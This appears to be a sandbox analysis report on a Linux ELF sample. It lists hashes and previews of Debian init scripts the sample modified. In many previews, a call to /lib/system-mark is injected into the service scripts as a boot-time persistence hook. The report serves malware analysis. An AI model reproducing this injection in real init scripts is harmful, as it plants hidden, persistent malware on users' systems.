Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON \|\| exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

/etc/init.d/cups-browsed

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1979
Entropy (8bit):	5.144887658077899
Encrypted:	false
SSDEEP:	48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFS2b:7j3FpjhnV5upSYuv3ScJQ2b
MD5:	B6B52BC4EBC4D496D01B30E2CFCF2C62
SHA1:	0221F156258ED821216CBF81280EE6324BDD52E9
SHA-256:	62B6CC632C9AC071EF72CDEB7057A4B20B7AE17413A289AEC43A67162B20A989
SHA-512:	B6FD6007E039984D1E505A62C76BB3373F3AF4A4DCB7E1AB7E2DF5C66D9D2F87DEB3DE2DEE97DF8FC33E9F94975B64DF03049C4DF60A1F02FADF4D5A7F6D4ED8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

/etc/init.d/dbus

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, Unicode text, UTF-8 text executable
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.118926067111819
Encrypted:	false
SSDEEP:	96:9JOxbyAn/JNsQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jw2U1MSIr7nXmL
MD5:	B05B34CA2A32E2007677F6CD40C3AF66
SHA1:	48F6C6EC5AE325D1E72224E27E98DE1CF817C521
SHA-256:	6C0251B0D84D116413A6DEF3B4D1699017BE1114E025B5E7E4B546237209574E
SHA-512:	692CE95159E6677954A6E573ADCDC5BFF11301E37CF25501F7205164CC2F4D24B6758663BE5ABD680EEC2E22C08AA491CEC269DDB696AC2D4EF99798CBC30495
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -- coding: utf-8 --.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system-mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

/etc/init.d/gdm3

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3102
Entropy (8bit):	5.042976496573067
Encrypted:	false
SSDEEP:	48:78unF1gLpxNlduwTebFGBzB4ndfPaMa59zqKN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1XV3B2dUdaVAGvoe2Wtc
MD5:	34C249DFA3336DB31FBE66E1CD5758F6
SHA1:	4B86122506102F1A88F72FF6D83C8E32B88F9D1E
SHA-256:	EE131550054FD4C8053F1C139C7F96CDBA8FD3F7CCFA78C1ED87DDD4FFC10D47
SHA-512:	B88FE306642B0757B24110D43BFF4A286D24C1995C0E6C3E9429E85E51D9D9DD4150BB4F99F818EDBC3CF2AFB2F9CE30CB1E7928B15CF8D41ADC330D3F0C58F3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON \|\| exit 0..if [ -r /etc/default/locale ]; then./lib/system-mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

/etc/init.d/hddtemp

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3163
Entropy (8bit):	5.259424339682965
Encrypted:	false
SSDEEP:	48:ietQlU+vdYb5tM7yL7yi47yIrrF9o6YRK50JDRABzNJuhCv8Z//UZJ7iuh052m3s:FtQlTd65tp6iN0oLRsQaAsUkho2mc
MD5:	78C631FF42D0225229009886F9999B56
SHA1:	4FAEF5CD07FC43C3AE00A1D09116580664EB9158
SHA-256:	0EA1C7D35BA69FB47D9AF56AA7FEEA00CC2F0A0F1ACB5796C48D4BB95F980D9E
SHA-512:	DF5DE7A268F0FFB5C6E95A32128877AAB05EA46331471D95E97DD4A31B883D0B9DE9005EC995F37AA254BEFE27A252961FF37148BB3E7896E30373FC16F96D84
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3946
Entropy (8bit):	5.1522498878727045
Encrypted:	false
SSDEEP:	96:uYqy3be4txLsMwqTZL5FFTUaTfNvagXQwjdjNvaYXDkeQz:VZbxtXFZNZTfNvawxjNva4e
MD5:	40E4F04E723FB5BEE6DF2327EA35254D
SHA1:	D512EAB734F222022E210CCA19128E992691CF78
SHA-256:	EEC4726C42AA93DEB9D6228BD464ED33FB6C1FF6FFD88ECC14C603746A7C444A
SHA-512:	71D245EA40A64FDCCAAA88D869F8E929F5FA9736FB16D7079CE41184CA9DA71F40E2E6EFED8382C4350089932AAC8C588271F72FB9E5139E35FF504C65127227
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

/etc/init.d/irqbalance

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2707
Entropy (8bit):	4.995870971917478
Encrypted:	false
SSDEEP:	48:92ZPnWGmH6TMV5m11QU7BXCW3gxxsXuHtpyBMbtKxxsDKV/BkH5:92Z/WbZnm11LByWwxKXuHtcBMbtKxKDr
MD5:	E666B216857A200A89A8C38279974070
SHA1:	5184B1942742E7D4811A8BA0080BD19413306EB5
SHA-256:	3A9EF64FD98E3991ABEE18FE69ED507EE8516B5777E7B3E8BB3BC69AE997D1F8
SHA-512:	A2BC047C6034F8594B640DD5A7746AAD3F6BEAC9239AA71C00C90EB19FF37FAD38B08A5ACC0B8E1928CC447450C0A69E3FB4C8A6EF65EC584227F0E8ACF1F3D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

/etc/init.d/iscsid

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	4.972539518025109
Encrypted:	false
SSDEEP:	24:2Ex/YpMr8MICUV7OlfrDNhay+HNCNIlH3U8lrQ5l8u4uuCG:/puMAMICu7OlN+UIlH3U8lc/ZWCG
MD5:	ECC4B12F805560CED916AF27BF8423D1
SHA1:	A5954BF38D2E34AE23286D676FE6E4153CDBFF69
SHA-256:	C33D4A5025DB90ACA69F23F041F2AFB4B31F1016DF03631C6D918A4EF5E6842D
SHA-512:	CFAC2CC9451D012F8A4DACFFC6ACA4C9456FF4F0D212C419443C0939CEB0AFE1DAE59329D9F9D27413A9E6CF2E0D05775C873AE53C355C0A8A738DB07120CAD3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	4.309956240738216
Encrypted:	false
SSDEEP:	48:9XfgD1yQyKzYcg/LshTJckS5MJAb8kGh5A9b6:9YQLH/w5SO
MD5:	89A7217DCF2B72ACC044B81A9CC3FC6F
SHA1:	E4E5E503268D650B4F0FE7C37DC0BD3EFA1CABC6
SHA-256:	896A6EAFC64047CB19D6319915BD349FD3B90A8BECA8A83AB2153EEC519A59E5
SHA-512:	8E6B76171B23133C44AB7CF19DCCCE87FD0AA38F4BC0520AB6F2AFA64CA506D447C192F0B09A8584D9C2203F665E89D8D33B3EA30E53681F5BA62A1DABC1DBC6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

/etc/init.d/kmod

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.907145181173842
Encrypted:	false
SSDEEP:	24:+mUxLADBzBQYDMAKjqg3Ulfb4MZC/tCYJGMsMHwDa1kig/ue5NrGgbcl8d:l/dtQYxKjRQfbO/oYJbJQAki6jzz
MD5:	0B192EEF5B7E6AE9C89B8E127943E04C
SHA1:	6F6B5F63D1F504524C5C27849353255A6EDEA52E
SHA-256:	D43E4D15B82D9D85BEF6B2B676506AED1B7FC3C50232BFB7BFE1D0202C83DCA3
SHA-512:	860ACA2D19758EAA6FD8C3D0552674842916C4F853A6739932A9E66B68582E5359AD91EE4F27443992ACCA380BFC33C2178BCAA21B93A812916CB228B831BA82
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] \|\| exit 0.[ -x /sbin/modprobe ] \|\| exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop\|restart\|reload\|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_action_msg "Loading kernel module $module". modprobe $module $args \|\| true. else. modprobe $module $args > /dev/null 2>&1 \|\| t

/etc/init.d/lightdm

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3534
Entropy (8bit):	5.282612583353571
Encrypted:	false
SSDEEP:	48:fbmo8vyUjH3J+cNrWId4KF9wDeXxr/FI/F7R7cJ0IB6rd/g1ZsbHaXAZ4td/WzvA:d8z3J+cNiR4SzGmJHyRDuHTWld
MD5:	E6E338C277324717A5722E4EA56AA2EE
SHA1:	46334BCB354D10D0AAC47F4D542710B66D446A77
SHA-256:	5BF68D24F74EC03AE3E2D53B8F57E51C8C3CB320FE53E5D6C8F3214E25EE9C29
SHA-512:	19AF2485DB58640CFEA8E245A4E1E57624239C12B961C7218B5B50FB880985D4275862F0F8FA805D004314844B791E8F2FE248A7797FF4D5082A892E34126DE9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

/etc/init.d/lm-sensors

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	901
Entropy (8bit):	5.1022129052660485
Encrypted:	false
SSDEEP:	12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsFoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/IwfJ2Hjq13O
MD5:	46FB137F6F75999F794FDB149BCAD53B
SHA1:	90F88FB0972A25A2BBEA62DB26EA84ED9CFC036D
SHA-256:	D661181FDD70CE80EF52393D7A58D33009CAE7ED2EB62C764C4CAC0181DD7E76
SHA-512:	C360EB8E5FD3E7A7740D6AE395DB430811306C176C9E3FEA975E76B6474533A30F709155A81F007E29DC61AE2200445CCD79F08139998BA575115F7CE45340CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM \|\| exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system-mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload\|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start\|stop\|restart\|force-reload\|status}"..exit 1.esac..exit 0..

/etc/init.d/lvm2-lvmpolld

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.314197695143652
Encrypted:	false
SSDEEP:	12:wdRDNeBuYrBMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Ex/lti9OXylj/
MD5:	273FB590FE7F5DAE000DC871BC5418DB
SHA1:	90575E32A398270FC2D10448A454646B84F3B257
SHA-256:	D9EDBDDD0D0151FDC741B4C0B8F6910DC01D9A6F2F2CBE5705297E4B27EE9C0F
SHA-512:	62B1896678941476EF1DF756AC16B136F0FDB1E86A53A8DC17340BDF03504BC7C54A8E04807B692A9F15A7904CE6E0087D3F6373C2CF1F6807444B36E45ABDCB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

/etc/init.d/mono-xsp4

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.325203715837751
Encrypted:	false
SSDEEP:	48:7HvaUX9Q3esRt33P4AWNr/42Fwk0qmA40O4pTjmCjVwUH:7PaUX0eSt3/VczgWBbjmCjVwS
MD5:	0DBC33D8B96CA2A841D1A83960BDF389
SHA1:	BDC86C7897C467A42075B2C80A1CAEDCCA794F76
SHA-256:	631AD4D36C691EBC1AADD6006C597B64A69F4AF1F6AA2455A8F4F2563F11F13D
SHA-512:	F6320E3BD73BC5AFFD6C3D13832F836CE81323C0A059D26C9294A65C3DA7B3A394BC5A20C6B07244F48499BB5B8E3A7869A7E48FAF916CEABC495B8D281BDB8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON \|\| exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system-mark. exit 0.fi..if [ ! -e $MO

/etc/init.d/multipath-tools

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2964
Entropy (8bit):	5.31314714541473
Encrypted:	false
SSDEEP:	48:7HUksR9JrtNCDCJ99TaPn1PCDCJ99TafOBUV1kqH2fQuzfg61U149eh7KKSKMs:7HUkwbrSDu+Pn1qDu+2qV1RHSQuzA4I5
MD5:	54E61FBA1E794A3A95B4FA31099CEB2F
SHA1:	4036B83019BAE7A2D843C13C52AA91A86C4D4CA4
SHA-256:	BAEC2D4F6968AE735457DE716EB7E880C03C410A53A1C19563C258D78852874E
SHA-512:	6AC88EF6CDE8A2D98ED14A879CEDD04B263F252C0A03E93FBF5F6B50AF5416BDD3BAC231E43C98BA5DF0043703D67F1852D9159672B43D5D5EC0EC61BA431688
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system-mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system-mark.for slave in slaves/;.do..if [ "$slave" = "slaves/" ]; then./lib/system-mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath \| sed -n "s/$.$: . $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system-mark....log_daemon_msg "Root is on a multipathed device, multipathd c

/etc/init.d/open-iscsi

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.112756814918559
Encrypted:	false
SSDEEP:	48:7UMRMrEm3cy8Nc8NgZlfMMtWBAl3ATeTPAdWIlRdWdtRMg02AC9ArANTcAhicF:7b2rH338azZlfn/lwA4dWIhC8DUbL
MD5:	207481F279E4D4E87E2455C16287C685
SHA1:	1CC3B8B32EE2BCD5342F38B66C936C4EC18897F4
SHA-256:	225B755072D5C433DE74DE26633834FF05A6956053557F1B3F634AE08752C6BF
SHA-512:	E494C2A33928070E2E1BACA3AE53814986AC7C9CEB3B4D31CAE0C0202AC2BEE98CF65A196387FAA7EED560B6AC6665EE6D3C77630167ADFDBF82C99FE3F65B14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] \|\| exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system-mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system-mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] \|\| ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

/etc/init.d/open-vm-tools

Download File

Process:	/tmp/Ww0lpzmYHO.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1881
Entropy (8bit):	4.863837327437562
Encrypted:	false
SSDEEP:	48:1a/f0aOHh86/X/QA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB86j4e8j8Q8Ml8OmooG2D3k
MD5:	CE0C8A7E1042C39FB28FEE6981E2ACE4
SHA1:	C7B193DB855B637F7011A28928DE2E0A5796B825
SHA-256:	32735889841F4B203B9C06278D9A178D08AF5288474F475A31F0AC2669C1DD56
SHA-512:	1B676B9B1CB75C48D5B4EE6D34E402A6B99C4CECA8B261177396C13E63323A5C6A9F62B556FFAB110C25B9066D4253E9C0ACB1D3DA790ECD70426DD9A0AA46C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system-mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} \| grep -iq vmware; then./lib/system-mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec 